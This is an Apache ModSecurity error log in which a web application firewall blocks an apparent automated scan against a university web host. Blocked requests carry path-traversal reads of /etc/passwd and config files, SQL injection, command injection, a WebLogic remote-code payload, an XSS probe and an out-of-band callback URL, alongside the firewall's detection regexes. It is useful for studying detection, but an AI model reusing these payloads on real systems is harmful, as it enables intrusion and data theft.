[Tue Aug 29 11:46:13.475473 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAi-Q-0AAAAH"]
[Tue Aug 29 11:46:14.416453 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAib50oAAAAA"]
[Tue Aug 29 11:46:15.360128 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhBSGUAAAAX"]
[Tue Aug 29 11:46:15.613088 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhzviwAAAAx"]
[Tue Aug 29 11:46:18.483985 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhl0BwAAAAi"]
[Tue Aug 29 11:46:18.487154 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi0JK0AAAAK"]
[Tue Aug 29 11:46:19.520832 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSG8AAAAX"]
[Tue Aug 29 11:46:20.418843 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhZRmsAAAAG"]
[Tue Aug 29 11:46:20.516719 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAib52wAAAAA"]
[Tue Aug 29 11:46:22.476344 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAfEB8gAAAAO"]
[Tue Aug 29 11:46:27.460083 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAdxUuwAAAAC"]
[Tue Aug 29 11:46:28.384150 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhl0DcAAAAi"]
[Tue Aug 29 11:46:28.408303 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhrqSIAAAAo"]
[Tue Aug 29 11:46:28.542486 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhl0DsAAAAi"]
[Tue Aug 29 11:46:29.707050 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOoAAAAK"]
[Tue Aug 29 11:46:30.647344 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjFodgAAAAF"]
[Tue Aug 29 11:46:30.729561 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAhtjlcAAAAq"]
[Tue Aug 29 11:46:30.735675 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjFodwAAAAF"]
[Tue Aug 29 11:46:31.630820 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjCa9QAAAAB"]
[Tue Aug 29 11:46:33.382789 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhui4oAAAAr"]
[Tue Aug 29 11:46:33.501688 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjH@uEAAAAI"]
[Tue Aug 29 11:46:34.381454 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjCa94AAAAB"]
[Tue Aug 29 11:46:35.445291 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhtjnAAAAAq"]
[Tue Aug 29 11:46:39.490670 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjH@vsAAAAI"]
[Tue Aug 29 11:46:42.367648 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14MsCo-f0AAAjL8PwAAAAR"]
[Tue Aug 29 11:46:42.419312 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjKyrwAAAAQ"]
[Tue Aug 29 11:46:43.585615 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAh4DdcAAAA2"]
[Tue Aug 29 11:46:47.447630 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhBSJgAAAAX"]
[Tue Aug 29 11:46:50.415045 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAjW9AMAAAAA"]
[Tue Aug 29 11:46:52.482873 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAi@TBEAAAAM"]
[Tue Aug 29 11:46:55.110590 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjavxgAAAAV"]
[Tue Aug 29 11:47:00.494352 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjKyuYAAAAQ"]
[Tue Aug 29 11:47:01.420856 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAhT39cAAAAD"]
[Tue Aug 29 11:47:02.428038 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjKyusAAAAQ"]
[Tue Aug 29 11:47:03.407827 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjkM0IAAAAI"]
[Tue Aug 29 11:47:05.491063 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjM7DEAAAAT"]
